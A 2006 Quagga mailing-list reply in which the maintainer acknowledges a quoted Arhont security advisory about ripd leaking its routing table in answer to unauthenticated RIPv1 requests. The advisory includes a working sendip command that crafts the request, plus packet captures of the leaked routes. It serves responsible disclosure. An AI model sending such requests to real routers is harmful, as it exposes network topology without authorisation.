[quagga-users 6835] Re: Quagga RIPD unauthenticated route table broadcast

Paul Jakma paul at clubi.ie
Wed May 3 05:27:43 IST 2006


Hi Konstantin,

Thanks very much for the report. I've created bug #261 for this 
issue. Note btw that the unicast replies will have default TTL set - 
the REQUESTing host need not be on-link, they could be anywhere. See 
my comments on the bug entry.

On Wed, 3 May 2006, Konstantin V. Gavrilenko wrote:

> Arhont Ltd - Information Security
>
> Advisory by:	Konstantin V. Gavrilenko (http://www.arhont.com)
> Arhont ref:	arh200604-1
> Advisory:	Quagga RIPD unauthenticated route table broadcast
> Class:		design bug?
> Version:	Tested on Quagga suite v0.98.5 v0.99.3(Gentoo, 2.6.15)
> Model Specific:	Other versions might have the same bug
>
>
> DETAILS
> Quagga would respond to RIP v1 request for SEND UPDATE and send out the
> routing table updates, even if it has been configured to work with
> version 2 of the protocol only, using the following settings in the
> config file:
>
> interface eth0
> ip rip send version 2
> ip rip receive version 2
> !
> router rip
> version 2
>
> Sending a request for update:
> arhontus / # sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p
> rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
>
> Catching response on the attacker host:
> arhontus / # tcpdump -n -i eth0 port 520
> 22:10:02.532103 IP 192.168.66.102.520 > 192.168.66.111.520: RIPv1,
> Request, length: 24
> 22:10:02.532474 IP 192.168.66.111.520 > 192.168.66.102.520: RIPv1,
> Response, length: 64
>
> Tethereal extract from the response RIP packet:
> Routing Information Protocol
>    Command: Response (2)
>    Version: RIPv1 (1)
>    IP Address: 0.0.0.0, Metric: 1
>        Address Family: IP (2)
>        IP Address: 0.0.0.0 (0.0.0.0)
>        Metric: 1
>    IP Address: 192.168.50.24, Metric: 1
>        Address Family: IP (2)
>        IP Address: 192.168.50.24 (192.168.50.24)
>        Metric: 1
>    IP Address: 192.168.77.0, Metric: 1
>        Address Family: IP (2)
>        IP Address: 192.168.77.0 (192.168.77.0)
>        Metric: 1
>
> The same situation is observed if Quagga has been configured to accept
> packets with plaintext or md5 authentication only, using the following
> options in the configuration:
>
> interface eth0
> ip rip authentication mode md5 auth-length old-ripd
> ip rip authentication key-chain dmz_auth
>
> The response packet contains the same information as in previous example.
>
>
> This vulnerability can be exploited to extract the routing table
> information from the router otherwise inaccessible due to strict control
> of the multicast packets spread on the switch ports, or extremely large
> interval set between  updates.
>
>
> RISK FACTOR: Low
>
>
> WORKAROUNDS: Firewall the access to the ripd daemon on the need to
> access basis.
>
> COMMUNICATION HISTORY:
> Issue discovered:	  10/04/2006
> Quagga notified:	  24/04/2006
> Public disclosure:	  03/05/2006
>
> ADDITIONAL INFORMATION:
> *According to the Arhont Ltd. policy, all of the found vulnerabilities
> and security issues will be reported to the manufacturer at least 7 days
> before releasing them to the public domains (such as CERT and BUGTRAQ).
>
> If you would like to get more information about this issue, please do
> not hesitate to contact Arhont team on info at arhont.com
>
>
>
>

-- 
Paul Jakma	paul at clubi.ie	paul at jakma.org	Key ID: 64A2FF6A
Fortune:
"We want to create puppets that pull their own strings."
-- Ann Marion

"Would this make them Marionettes?"
-- Jeff Daiell


More information about the Quagga-users mailing list